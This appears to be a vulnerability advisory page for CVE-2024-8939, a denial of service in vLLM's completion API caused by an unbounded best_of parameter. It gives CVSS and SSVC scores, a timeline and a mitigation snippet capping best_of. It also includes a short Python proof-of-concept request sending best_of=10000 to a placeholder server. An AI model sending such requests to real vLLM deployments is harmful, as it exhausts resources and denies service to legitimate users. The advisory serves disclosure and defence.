
CVE-2024-8939

vLLM: Denial of Service in vLLM JSON Web API

Severity Score: 6.2 *CVSS v3.1
Exploit Likelihood: - *EPSS
Affected Versions: - *CPE
Public Exploits: 0 *Multiple Sources
Exploited in Wild: - *KEV
Decision: Track *SSVC
Descriptions

A vulnerability was found in the ilab model serve component, where improper handling of the best_of parameter in the vllm JSON web API can lead to a Denial of Service (DoS). The API used for LLM-based sentence or chat completion accepts a best_of parameter to return the best completion from several options. When this parameter is set to a large value, the API does not handle timeouts or resource exhaustion properly, allowing an attacker to cause a DoS by consuming excessive system resources. This leads to the API becoming unresponsive, preventing legitimate users from accessing the service.

*Credits: Red Hat would like to thank Thibault Guittet for reporting this issue.
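The sketch below illustrates the request shape the description refers to: a single completion call whose best_of value asks the server to generate and rank a very large number of candidate completions. It assumes a vLLM OpenAI-compatible server at a placeholder host and model name; the endpoint path, host, model, and numeric values are illustrative assumptions, not details taken from the advisory.

```python
# Minimal sketch of the resource-exhaustion vector described above.
# Host, model name, and parameter values are placeholders.
import requests

payload = {
    "model": "my-model",   # placeholder model identifier
    "prompt": "Hello",
    "max_tokens": 16,
    # The advisory's point: a very large best_of makes the engine produce and
    # score that many candidate completions for one request, consuming
    # memory and compute out of proportion to the response returned.
    "best_of": 10_000,
    "n": 1,
}

# Without server-side bounds or timeouts on best_of, requests like this can
# keep the engine busy long enough to starve legitimate traffic.
resp = requests.post(
    "http://localhost:8000/v1/completions",  # assumed OpenAI-compatible endpoint
    json=payload,
    timeout=30,
)
print(resp.status_code, resp.text[:200])
```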
CVSS Scores
  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: None
  • Availability: High
* Common Vulnerability Scoring System
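For reference, the metrics above correspond to the vector CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. The short sketch below reproduces the 6.2 base score from those metrics using the weights published in the CVSS v3.1 specification; the roundup helper is a simplified version of the spec's rounding rule.

```python
# Reproduce the 6.2 base score from AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H.
import math

# Metric weights (scope unchanged) from the CVSS v3.1 specification.
AV_LOCAL, AC_LOW, PR_NONE, UI_NONE = 0.55, 0.77, 0.85, 0.85
C_NONE, I_NONE, A_HIGH = 0.0, 0.0, 0.56

def roundup(value: float) -> float:
    """Round up to one decimal place (simplified CVSS roundup)."""
    return math.ceil(value * 10) / 10

iss = 1 - (1 - C_NONE) * (1 - I_NONE) * (1 - A_HIGH)           # 0.56
impact = 6.42 * iss                                            # ~3.60 (scope unchanged)
exploitability = 8.22 * AV_LOCAL * AC_LOW * PR_NONE * UI_NONE  # ~2.52

base = 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))
print(base)  # 6.2
```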
SSVC
  • Decision: Track
  • Exploitation: None
  • Automatable: No
  • Technical Impact: Partial
* Organization's Worst-case Scenario
Timeline
  • 2024-09-17 CVE Reserved
  • 2024-09-17 CVE Published
  • 2024-09-18 CVE Updated
  • 2024-09-18 EPSS Updated
  • ---------- Exploited in Wild
  • ---------- KEV Due Date
  • ---------- First Exploit
CWE
  • CWE-400: Uncontrolled Resource Consumption
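As a rough illustration of how uncontrolled resource consumption is typically addressed in this setting, the sketch below bounds best_of before a request reaches the inference engine. The cap value, function name, and error handling are illustrative assumptions, not the actual fix shipped for this CVE.

```python
# Minimal sketch of server-side input bounding for CWE-400 in this context.
# MAX_BEST_OF and validate_best_of are hypothetical, deployment-chosen names.
MAX_BEST_OF = 20  # illustrative ceiling; pick a limit that fits your hardware

def validate_best_of(params: dict) -> dict:
    """Reject an oversized or malformed best_of before any generation starts."""
    best_of = params.get("best_of", 1)
    if not isinstance(best_of, int) or best_of < 1:
        raise ValueError("best_of must be a positive integer")
    if best_of > MAX_BEST_OF:
        raise ValueError(f"best_of must not exceed {MAX_BEST_OF}")
    return params
```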
CAPEC
Affected Vendors, Products, and Versions
Vendor    Product    Version    Other    Status
-         -          -          -        -